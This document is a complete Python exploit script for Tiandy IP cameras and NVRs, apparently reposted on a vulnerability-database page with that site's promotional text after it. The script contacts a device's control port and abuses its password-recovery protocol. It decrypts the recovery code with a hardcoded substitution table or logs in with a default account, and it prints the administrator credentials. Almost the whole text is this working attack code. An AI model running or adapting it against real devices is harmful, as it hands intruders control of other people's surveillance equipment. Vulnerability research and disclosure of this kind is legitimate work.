`# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A
# Requires Python 3 and PyCrypto
# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research
import sys
import hashlib
import base64
import socket
import struct
from Crypto.Cipher import DES
def main():
    """Command-line entry point: run the recovery flow against one host.

    Takes exactly one argument, the host. Up to two security-code attempts
    are made; when the device does not offer the FINDPSW flow (or no code
    could be obtained) the default account is tried instead. Results go to
    stdout, diagnostics to stderr, and the process exits with status 1 when
    nothing was recovered.
    """
    if len(sys.argv) != 2:
        print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
        exit(1)

    conn = Channel(sys.argv[1])
    conn.connect()
    crypt_key = conn.get_crypt_key(65536)

    tried_to_set_mail = False
    ok = False

    for _ in range(2):
        code = get_psw_code(conn)

        if code is False:
            # psw not supported
            break

        if code is None:
            if not tried_to_set_mail:
                print("No PSW data found, we'll try to set it...", file=sys.stderr)
                tried_to_set_mail = True
                # NOTE(review): this literal looks like a placeholder left by
                # e-mail obfuscation on the page this file was copied from --
                # confirm the intended address.
                if try_set_mail(conn, '[email protected]'):
                    code = get_psw_code(conn)

            if code is None:
                print("couldn't set mail", file=sys.stderr)
                break

        rcode, password = recover_with_code(conn, code, crypt_key)

        if rcode == 5:
            print('The device is locked, try again later.', file=sys.stderr)
            break

        if rcode == 0:
            print('Admin', password)
            ok = True
            break

    # Undo the temporary mail setting if we changed it.
    if tried_to_set_mail:
        try_set_mail(conn, '')

    if not code:
        print("PSW is not supported, trying default credentials...", file=sys.stderr)
        credentials = recover_with_default(conn, crypt_key)
        if credentials:
            user, pw = credentials
            print(user, pw)
            ok = True

    if not ok:
        print('Recovery failed', file=sys.stderr)
        exit(1)
def try_set_mail(conn, target):
    """Send a RESERVEPHONE request carrying *target* and check the reply.

    Returns True when fields 4..6 of the reply are
    ``['RESERVEPHONE', '2', '1']``, otherwise False.
    """
    request = ['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT']
    conn.send_msg(request)
    reply = conn.recv_msg()
    expected = ['RESERVEPHONE', '2', '1']
    return reply[4:7] == expected
def get_psw_code(conn):
    """Request the FINDPSW data from the device and derive the security code.

    Returns:
        False when the reply is not a FINDPSW reply,
        None when the reply carries no PSW data,
        otherwise the last 8 hex digits of the MD5 of the decrypted data.

    Raises:
        Exception: if the reported PSW type is not 1, 2 or 3.
    """
    admin_b64 = base64.b64encode(b'Admin').decode()
    conn.send_msg(['IP', 'USER', 'LOGON', admin_b64, admin_b64, '', '65536', 'UTF-8', '0', '1'])
    resp = conn.recv_msg()

    if resp[4] != 'FINDPSW':
        return False

    # Fields 6 and 7 are only present when the device has PSW data.
    if len(resp) <= 7 or not resp[7]:
        return None
    psw_reg, psw_data = resp[6], resp[7]

    psw_type = int(resp[5])
    if psw_type not in (1, 2, 3):
        raise Exception('unsupported psw type: '+str(psw_type))

    if psw_type == 1:
        psw_data = psw_data.split(':')[1]
        psw_key = psw_reg[:0x1f]
    else:
        if psw_type == 3:
            # Type 3 wraps the value in a quoted structure; take the 2nd quoted item.
            psw_data = psw_data.split('"')[3]
        psw_key = psw_reg[:4].lower()

    psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
    return hashlib.md5(psw_code).hexdigest()[24:]
def recover_with_code(conn, code, crypt_key):
    """Submit a security code and return ``(status, password)``.

    The status is field 6 of the reply as an int. The password is field 8
    decoded with *crypt_key* when the status is 0, otherwise None.
    """
    conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
    reply = conn.recv_msg()

    status = int(reply[6])
    password = None
    if status == 0:
        password = decode(reply[8].encode(), crypt_key).decode()
    return status, password
def recover_with_default(conn, crypt_key):
    """Log in with the ``Default`` account and read back the user info.

    Returns False when the login is rejected. Otherwise blocks reading
    messages until a GETUSERINFO message arrives and returns its fields 6
    and 7, each decoded with *crypt_key*, as a ``(user, password)`` tuple.
    """
    if not conn.login_with_key(b'Default', b'Default', crypt_key):
        return False

    wanted = ['IP', 'INNER', 'SUPER', 'GETUSERINFO']
    msg = conn.recv_msg()
    while msg[1:5] != wanted:
        msg = conn.recv_msg()

    user = decode(msg[6].encode(), crypt_key).decode()
    password = decode(msg[7].encode(), crypt_key).decode()
    return user, password
###
### lib/des.py
###
def reverse_bits(data):
    """Return *data* as bytes with the bit order of every byte reversed."""
    flipped = bytearray()
    for value in data:
        # Multiply/mask/modulo trick: replicate the byte, pick one bit from
        # each copy, then fold the picked bits back into a single byte.
        spread = value * 0x0202020202
        flipped.append((spread & 0x010884422010) % 0x3ff)
    return bytes(flipped)
def pad(data):
    """Pad *data* to a multiple of 8 bytes.

    Input that is already aligned is returned unchanged. Otherwise zero
    bytes are appended, followed by one final byte holding the pad length.
    """
    remainder = len(data) % 8
    if remainder == 0:
        return data
    padlen = 8 - remainder
    return data + bytes(padlen - 1) + bytes([padlen])
def unpad(data):
    """Strip the padding added by ``pad`` if the tail looks like padding.

    The last byte is read as the pad length. The padding is removed only
    when that length is in 1..8 and the bytes before it within the pad are
    all zero; otherwise *data* is returned unchanged. Empty input is
    returned as-is instead of raising IndexError.
    """
    if not data:
        # Nothing to inspect; indexing data[-1] would raise on empty input.
        return data
    padlen = data[-1]
    if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00' * (padlen - 1):
        return data[:-padlen]
    return data
def encrypt(data, key):
    """DES-ECB encrypt *data* with *key*, bit-reversing every byte around the cipher.

    The key, the padded plaintext and the resulting ciphertext are each
    passed through ``reverse_bits``.
    """
    cipher = DES.new(reverse_bits(key), DES.MODE_ECB)
    plaintext = reverse_bits(pad(data))
    return reverse_bits(cipher.encrypt(plaintext))
def decrypt(data, key):
    """Inverse of ``encrypt``: DES-ECB decrypt *data* with *key* and strip padding.

    The key, the ciphertext and the resulting plaintext are each passed
    through ``reverse_bits`` before ``unpad`` is applied.
    """
    cipher = DES.new(reverse_bits(key), DES.MODE_ECB)
    ciphertext = reverse_bits(data)
    return unpad(reverse_bits(cipher.decrypt(ciphertext)))
def encode(data, key):
    """Encrypt *data* with *key* and return the ciphertext base64-encoded (bytes)."""
    ciphertext = encrypt(data, key)
    return base64.b64encode(ciphertext)
def decode(data, key):
    """Base64-decode *data* and decrypt the result with *key*."""
    ciphertext = base64.b64decode(data)
    return decrypt(ciphertext, key)
###
### lib/binproto.py
###
def recvall(s, l):
    """Read up to *l* bytes from socket-like *s*, looping over short reads.

    Stops early when ``recv`` returns nothing, so the result may be shorter
    than *l*.
    """
    chunks = []
    remaining = l
    while remaining > 0:
        chunk = s.recv(remaining)
        if not chunk:
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)
class Channel:
    """TCP client for the device's framed message protocol.

    Command messages are tab-separated text fields terminated by three
    newlines and wrapped in a 20-byte binary header; stream-data packets use
    a different header magic. Received command messages are queued so they
    can be consumed one at a time with ``recv_msg``.
    """

    def __init__(self, ip, port=3001):
        """Store the target address; no connection is made until ``connect``."""
        self.ip = ip
        # Packed IPv4 address with the byte order reversed, used in data headers.
        self.ip_bytes = socket.inet_aton(ip)[::-1]
        self.port = port
        self.msg_seq = 0
        self.data_seq = 0
        self.msg_queue = []

    def fileno(self):
        """Return the socket's file descriptor (requires a prior ``connect``)."""
        return self.socket.fileno()

    def connect(self):
        """Open a new TCP connection to ``(ip, port)``."""
        self.socket = socket.socket()
        self.socket.connect((self.ip, self.port))

    def reconnect(self):
        """Close the current socket and open a fresh connection."""
        self.socket.close()
        self.connect()

    def send_cmd(self, data):
        """Send *data* (bytes) as one command packet and advance ``msg_seq``."""
        header = struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data))
        self.socket.sendall(b'\xf1\xf5\xea\xf5' + header + data)
        self.msg_seq += 1

    def send_data(self, stream_type, data):
        """Send *data* (bytes) as one stream-data packet and advance ``data_seq``."""
        header = struct.pack(
            '<4sI4sHHI',
            b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type,
        )
        self.socket.sendall(header + data)
        self.data_seq += 1

    def recv(self):
        """Read one packet from the socket.

        Returns:
            ``(None, [stream_type, payload])`` for a stream-data packet, or
            ``(msgs, None)`` for a command packet, where ``msgs`` is a list
            of messages and each message is a list of string fields.

        Raises:
            Exception: on an unknown header magic, a size mismatch, or a
                data payload that does not start with ``NVS\\x00``.
        """
        hdr = recvall(self.socket, 20)

        if hdr[:4] == b'\xf1\xf5\xea\xf9':
            lsize, stream_type = struct.unpack('<14xHI', hdr)
            data = recvall(self.socket, lsize - 20)
            if data[:4] != b'NVS\x00':
                print(data[:4], b'NVS\x00')
                raise Exception('invalid data header')
            return None, [stream_type, data[8:]]

        elif hdr[:4] == b'\xf1\xf5\xea\xf5':
            lsize, dsize = struct.unpack('<6xH10xH', hdr)
            if lsize != dsize + 20:
                raise Exception('size mismatch')

            msgs = []
            for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
                msg = msg.split('\t')
                # Messages that do not start with an address get ours prepended
                # so field indexes are the same for every message.
                if '.' not in msg[0]:
                    msg = [self.ip] + msg
                msgs.append(msg)
            return msgs, None

        else:
            raise Exception('invalid packet magic: ' + hdr[:4].hex())

    def recv_msg(self):
        """Return the next command message, reading from the socket if needed.

        Queued messages are returned first. Stream-data packets that arrive
        while waiting are skipped, because ``recv`` reports them with
        ``msgs`` set to None and they carry no command message.
        """
        if self.msg_queue:
            return self.msg_queue.pop(0)

        while True:
            msgs, _ = self.recv()
            if msgs is not None:
                break

        # Keep any additional messages from the same packet for later calls.
        self.msg_queue.extend(msgs[1:])
        return msgs[0]

    def send_msg(self, msg):
        """Send a list of string fields as one command message."""
        self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())

    def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
        """Send a LOGON request and return the key carried in the reply.

        The reply must be ``LOGONFAILED`` with code ``3``; field 8 of that
        reply is base64-decoded and returned.

        Raises:
            Exception: if the reply is anything else (the reply is printed first).
        """
        self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
        resp = self.recv_msg()

        if resp[4:6] != ['LOGONFAILED', '3']:
            print(resp)
            raise Exception('unrecognized login response')

        crypt_key = base64.b64decode(resp[8])
        return crypt_key

    def login_with_key(self, uname, pw, crypt_key):
        """Reconnect and log in using MD5 digests salted with *crypt_key*.

        Returns False when the reply is ``LOGONFAILED``. Otherwise the reply
        is pushed back to the front of the message queue and True is returned.
        """
        self.reconnect()

        hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
        hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())

        self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
        resp = self.recv_msg()

        if resp[4] == 'LOGONFAILED':
            return False

        self.msg_queue = [resp] + self.msg_queue
        return True

    def login(self, uname, pw):
        """Fetch a key for the account, then log in with it.

        Returns the key on success, False when the login is rejected.
        """
        crypt_key = self.get_crypt_key(1, uname, pw)

        if not self.login_with_key(uname, pw, crypt_key):
            return False

        return crypt_key
###
### lib/crypt.py
###
pat = b'abcdefghijklmnopqrstuvwxyz0123456789'


def td_asctonum(code):
    """Map a byte value to its index in ``pat``, ignoring letter case.

    *code* is an int byte value. Upper-case ASCII letters are folded to
    lower case first. Returns None when the byte is not a letter or digit.
    """
    if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        code += 0x20
    position = pat.find(code)
    return position if position >= 0 else None
def td_numtoasc(code):
    """Return the byte value at index *code* of ``pat``, or None when *code* is 36 or more."""
    return pat[code] if code < 36 else None
# Substitution table used by td_decrypt: 36 rows, selected by the number of
# the current key character (see td_asctonum). The position of a ciphertext
# byte within the selected row is the number of the plaintext character.
# NOTE(review): every row appears to be a 36-character permutation -- confirm.
gword = [
b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]
def td_decrypt(data, key):
    """Decode *data* with the ``gword`` substitution table, keyed by *key*.

    Both arguments are bytes. Key bytes that are not ASCII letters or digits
    are skipped, and the remaining key characters are used cyclically, one
    per data byte, to select a row of ``gword``. The index of the data byte
    in that row is converted back to a character with ``td_numtoasc``.

    Returns:
        The decoded bytes, or None when a data byte does not occur in the
        selected row or when *key* contains no usable character. Empty
        *data* always yields ``b''``.
    """
    if not data:
        return b''

    # Resolve the key once. A key without any letter or digit previously made
    # the per-byte key scan loop forever (or raise IndexError when empty).
    key_nums = [num for num in map(td_asctonum, key) if num is not None]
    if not key_nums:
        return None

    ret = []
    for pos, code in enumerate(data):
        row = gword[key_nums[pos % len(key_nums)]]
        cpos = row.find(code)
        if cpos < 0:
            return None
        ret.append(td_numtoasc(cpos))

    return bytes(ret)
# Run the recovery flow only when this file is executed as a script.
if __name__ == '__main__':
    main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
API
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation